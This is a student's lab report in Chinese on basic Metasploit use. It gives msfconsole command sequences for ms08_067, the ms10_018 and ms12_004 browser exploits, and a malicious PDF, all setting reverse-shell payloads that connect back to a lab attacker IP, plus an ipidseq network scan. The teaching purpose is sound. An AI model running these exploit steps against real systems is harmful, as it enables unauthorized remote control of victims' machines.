Exp5 MSF基础应用 20164302 王一帆
1.实验内容
1.1实验要求
一个主动攻击实践,ms08_067;
一个针对浏览器的攻击,MS10-018(成功且唯一),MS12-004(成功且唯一);
一个针对客户端的攻击,adobe_toolbutton;
成功应用任何一个辅助模块Ipidseq。
1.2基础问题回答
1.2.1用自己的话解释什么是exploit,payload,encode。
(1)exploit 是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。
(2)payload就是需要传送到靶机上的攻击代码本身。
(3)encode是对攻击代码进行完善,伪装,使其能正常运行并且尽量躲避AV的查杀。
1.2.2离实战还缺些什么技术或步骤?
一是靶机是版本很旧的WindowsXP系统,浏览器IE版本也很低,基本没有防御能力基本,攻击比较容易,实际上的电脑应该不会有这么低版本的,缺少足够的能力去挖掘出现在与时俱进的各类新型系统、应用版本中存在的漏洞,是非常重要的一点。二是在攻击浏览器的时候,需要靶机访问生成的网址,实战中那么明显的IP网址一般不会轻易访问,还是要进行伪装,再加上防火墙、IDS等告警机制的干扰,较于本次实验,实战会复杂得多。
1.3基础准备
靶机版本:Microsoft Windows XP【Version 5.1.2600】
靶机IP地址:192.168.1.189
攻击机(linux)IP地址:192.168.1.227
2.实验过程
2.1一个主动攻击实践,ms08_067
2.1.1在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use exploit/windows/smb/ms08_067_netapi show payloads set payload generic/shell_reverse_tcp //tcp反向回连 set LHOST 192.168.1.227 //攻击机ip set LPORT 4302//攻击端口 set RHOST 192.168.1.189 //靶机ip set target 0 //自动选择目标系统类型,匹配度较高 exploit //攻击
2.2一个针对浏览器的攻击
2.2.1ms10-018
先搜索有关ms10_018漏洞的攻击程序,搜索后发现有两个,这里我选择use第一个exploit/windows/browser/ms10_018_ie_behaviors。
show options查看可用的攻击荷载,选择一个设定。
查看配置,发现多一个SRVHOST和SRVPORT,这是msf所属主机的IP,端口号默认,再设置一个监听主机IP(LHOST),同样target设为0,开启监听。
将生成的URL发送到靶机,在靶机上打开链接。
只有最后一行提示successfully的回话才能成功控制,没有提示的就说明没能完全建立回话,就无法达到控制效果。之前试了好几次都没有成功,要多试几次,终于出现了successfully。
输入 sessions 显示当前建立起的会话。
sessions -i n 进入某一个会话,建议n值取会话id最大的那一个的值,如上图有两个绘画,就选取了2。
2.2.2ms12-004
前面步骤基本差不多,先搜索 search ms12_004 ,只出来一个攻击模块,使用 use 调用,设置参数,payload和上面用的一样,多一个参数URIPATH (统一资源标识符路径)设置为 / (可以随意设置,就用来标识自己的链接的)。
开启监听,在靶机上访问上图链接,等待成功。
这个地方也是试了好几次才成功。。。
居然5个会话,可能因为尝试了好几次才成功吧。
2.3一个针对客户端的攻击,adobe_toolbutton
2.3.1在msf下用search
依次输入以下指令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp //tcp反向回连 set LHOST 192.168.1.227 //攻击机ip set LPORT 4302 //攻击端口 set FILENAME exp5_4302.pdf //设置生成pdf文件的名字 exploit //攻击
生成了pdf,这里注意文件所在位置。.msf4在主文件目录里面是隐藏的,所以在找exp5_4302.pdf时,要将隐藏文件显示,才能找到。将pdf文件传送或拷贝到靶机上(先通过共享文件夹传到自己的电脑上,然后再复制到靶机上),
然后在靶机上打开exp5_4302.pdf文件,运行后,回连成功。
运行ipconfig命令
2.4成功应用任何一个辅助模块Ipidseq
扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。
use auxiliary/scanner/ip/ipidseq 查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。
对单一目标主机的扫描
对指定网段的主机进行扫描
3.实验总结
这次实验的过程总体来说还是比较顺利的,第一次没有成功,多试几次也就成功了,也说明了靶机的防御能力很差,攻击成功也存在一个的概率;通过这次实验,又学习了msf的一些新功能,再一次被linux的强大所惊异,系统的漏洞有很多,攻击的方法更是千千万万。
转载于:https://www.cnblogs.com/wyf20164302/p/10721133.html
Exp5 MSF基础应用 20164302 王一帆相关推荐
- 网络对抗 Exp5 MSF基础应用 20154311 王卓然
Exp5 MSF基础应用 1. 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067: 1.2 一个针 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155210 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 如图: 根据上图,我们输入 ...
- 20155216 Exp5 MSF基础应用
Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 《网络对抗》Exp5 MSF基础应用
20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...
- 20155220 Exp5 MSF基础应用
Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 根据上图,我们输入use ...
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
最新文章
- 今天写了个Win32服务设置软件,呵呵,纯绿色软件
- React Native封装Toast与加载Loading组件
- P16对member进行代码生成时,访问端口出现This application has no explicit mapping for /error, so you are seeing this
- 凌云架构V0.1——第一部分 Why架构?——第一章 新项目来了
- Zookeeper基础使用机制原理
- osg着色语言着色_探索数字着色
- gradle配置_Gradle配置
- android 知识体系
- Java中的抽象类和接口(interface),abstract关键字的用法
- 区块链学习笔记:DAY05 如何使用公有云区块链服务
- 中国移动将于11月4日首发上会 拟募资560亿元
- Spring中,修改注入的bean名称
- (原創) 無論設計軟體硬體,拿到spec後,第一件事情就是model (OO)
- JAVA贪吃蛇游戏1.0版本
- 人脸识别常用数据集大全
- AB PLC软件如何破解?
- weui 开发文档
- 胶东机场t1离哪个停车场近,青岛胶东国际机场停车场攻略
- 用浏览器访问防火墙提示建立连接失败的有点总结
- 西门子数控机床如何用FTP进行程序传输
热门文章
- 解密微信电脑版image文件夹下缓存的用户图片
- JS将unicode码转中文方法
- 实现类似PS魔棒功能(漫水填充floodfill()) OpenCV
- 浅聊矢量场 —— 3. 什么是旋度(Rotational Vector)
- PySpark之电商广告推荐(1)
- 客户端七牛方式上传文件
- 论学习过程中“结构化”的思维必要作用
- efishell无法开机shell_efi shell 添加启动项 修复启动
- 如何将Google表格电子表格插入Google文档
- 微生物qPCR定量检测